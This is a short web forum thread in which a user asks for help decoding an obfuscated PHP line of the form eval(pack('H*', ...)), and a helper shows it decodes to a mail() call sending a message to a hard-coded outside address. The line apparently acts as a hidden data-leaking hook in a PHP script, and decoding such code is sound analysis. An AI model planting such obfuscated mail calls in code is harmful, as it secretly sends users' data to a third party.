Results 1 to 4 of 4

Thread: Help with Encoded Data

  1. #1
    Join Date
    Oct 2010
    Posts
    2
    Thanks
    1
    Thanked 0 Times in 0 Posts

    Default Help with Encoded Data

    i want to decode the following code please help me out to decode this


    PHP Code:
    eval(pack("H*""6d61696c28226164726573736c696e6540766f696c612e6672222c247375626a6563742c246d6573736167652c2468656164657273293b")); 
    Last edited by evainsster; 10-25-2010 at 01:41 PM.

  2. #2
    Join Date
    Apr 2008
    Location
    So.Cal
    Posts
    3,643
    Thanks
    63
    Thanked 516 Times in 502 Posts
    Blog Entries
    5

    Default

    Code:
    mail("adressline@voila.fr",$subject,$message,$headers);
    Learn more here

  3. The Following User Says Thank You to traq For This Useful Post:

    evainsster (10-24-2010)

  4. #3
    Join Date
    Oct 2010
    Posts
    2
    Thanks
    1
    Thanked 0 Times in 0 Posts

    Default

    Thanks you very much traq

  5. #4
    Join Date
    Apr 2008
    Location
    So.Cal
    Posts
    3,643
    Thanks
    63
    Thanked 516 Times in 502 Posts
    Blog Entries
    5

    Default

    you're welcome. if that answers your question, you should edit your first post and change the thread title prefix to "Resolved".

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •